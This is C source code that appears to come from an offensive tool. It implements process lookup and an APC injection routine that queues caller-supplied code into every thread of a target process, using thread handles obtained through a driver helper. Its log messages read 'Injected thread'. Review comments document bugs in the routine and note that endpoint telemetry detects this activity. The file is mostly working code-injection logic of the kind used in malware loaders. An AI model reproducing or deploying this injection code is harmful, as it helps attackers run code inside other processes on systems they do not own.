#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>
#include "mlwrfox.h"
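/*
 * LocateProcess: look up a process id by executable name.
 *
 * szProcessName - exact, case-sensitive executable name compared with
 *                 strcmp() against PROCESSENTRY32.szExeFile (e.g. "foo.exe").
 *
 * Returns the th32ProcessID of the first matching entry in a
 * TH32CS_SNAPPROCESS snapshot, or 0 when the name is NULL, the snapshot
 * cannot be taken, the enumeration fails, or no process matches.
 *
 * Fix: the original declared `pid` without an initializer and returned it
 * on the no-match path, so callers received an indeterminate value
 * (undefined behaviour) instead of 0.
 */
DWORD LocateProcess(
    PCHAR szProcessName
)
{
    HANDLE hProcSnap;
    PROCESSENTRY32 pProc32;
    DWORD pid = 0;  /* 0 doubles as "not found", matching the failure paths */

    if (szProcessName == NULL) {
        return 0;   /* strcmp() on NULL would be undefined behaviour */
    }

    hProcSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hProcSnap == INVALID_HANDLE_VALUE) {
        return 0;
    }

    /* dwSize must be set before Process32First, otherwise the call fails. */
    pProc32.dwSize = sizeof(pProc32);
    if (!Process32First(hProcSnap, &pProc32)) {
        CloseHandle(hProcSnap);
        return 0;
    }

    do {
        if (strcmp(szProcessName, pProc32.szExeFile) == 0) {
            pid = pProc32.th32ProcessID;
            break;  /* first match wins */
        }
    } while (Process32Next(hProcSnap, &pProc32));

    CloseHandle(hProcSnap);
    return pid;
}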
/*
 * LocateThread: walk every thread owned by dwProcId and act on each one.
 *
 * hDriver      - passed straight through to AcquireThread; its meaning is
 *                defined by that helper (presumably declared in mlwrfox.h,
 *                not visible in this file -- confirm).
 * dwProcId     - owner process id; also passed to CreateToolhelp32Snapshot,
 *                and only THREADENTRY32 entries whose th32OwnerProcessID
 *                equals it are touched.
 * pMemory      - cast to PAPCFUNC and queued with QueueUserAPC when
 *                ResetThreads is not TRUE.
 * pParam       - passed as the APC's ULONG_PTR argument.
 * ResetThreads - when exactly TRUE, ResumeThread is called instead of
 *                queuing an APC. The test is `!= TRUE`, so any BOOL value
 *                other than 1 takes the QueueUserAPC path.
 *
 * Returns: `tid` is declared but never assigned anywhere in this function,
 * so the value returned on the success path is indeterminate (reading an
 * uninitialized automatic is undefined behaviour). Callers must not rely
 * on it; only the two early-exit paths return a defined 0.
 *
 * Review notes (code left as-is in this pass):
 *  - AcquireThread's result is ignored and hThread starts as NULL, so if
 *    the helper fails, QueueUserAPC / ResumeThread / CloseHandle are handed
 *    a NULL handle; none of their return values are checked either.
 *  - printf uses "%i" for th32ThreadID, which is a DWORD (unsigned long);
 *    "%lu" is the matching conversion.
 *  - Queuing APCs into another process's threads via a driver-obtained
 *    handle is the activity endpoint telemetry keys on; this function is
 *    where it originates in this file.
 */
DWORD LocateThread(
HANDLE hDriver,
DWORD dwProcId,
LPVOID pMemory,
LPVOID pParam,
BOOL ResetThreads
)
{
HANDLE hThrdSnap;
THREADENTRY32 pThrd32;
DWORD tid;  /* never written below -- see header comment */
/* TH32CS_SNAPTHREAD enumerates all threads system-wide; the filter by owner is done in the loop. */
hThrdSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, dwProcId);
if ( hThrdSnap == INVALID_HANDLE_VALUE )
return (0);
/* dwSize must be set before Thread32First or the call fails. */
pThrd32.dwSize = sizeof(THREADENTRY32);
if ( !Thread32First(hThrdSnap, &pThrd32) ) {
CloseHandle(hThrdSnap);
return 0;
};
do
{
if ( dwProcId == pThrd32.th32OwnerProcessID )
{
HANDLE hThread = NULL;
/* Opaque helper: presumably fills hThread for th32ThreadID through hDriver -- its return value is not checked here. */
AcquireThread(hDriver, &pThrd32.th32ThreadID, &hThread);
if ( ResetThreads != TRUE ) {
/* pMemory is treated as the APC routine and pParam as its single argument. */
QueueUserAPC((PAPCFUNC)pMemory, (HANDLE)hThread,
(ULONG_PTR)pParam);
printf("[+] Injected thread %i\n", pThrd32.th32ThreadID);
} else {
printf("[+] Resumed thread %i\n", pThrd32.th32ThreadID);
ResumeThread(hThread);
};
/* Handle is per-iteration: closed here regardless of which branch ran. */
CloseHandle(hThread);
};
} while ( Thread32Next(hThrdSnap, &pThrd32) );
CloseHandle(hThrdSnap);
return tid;
};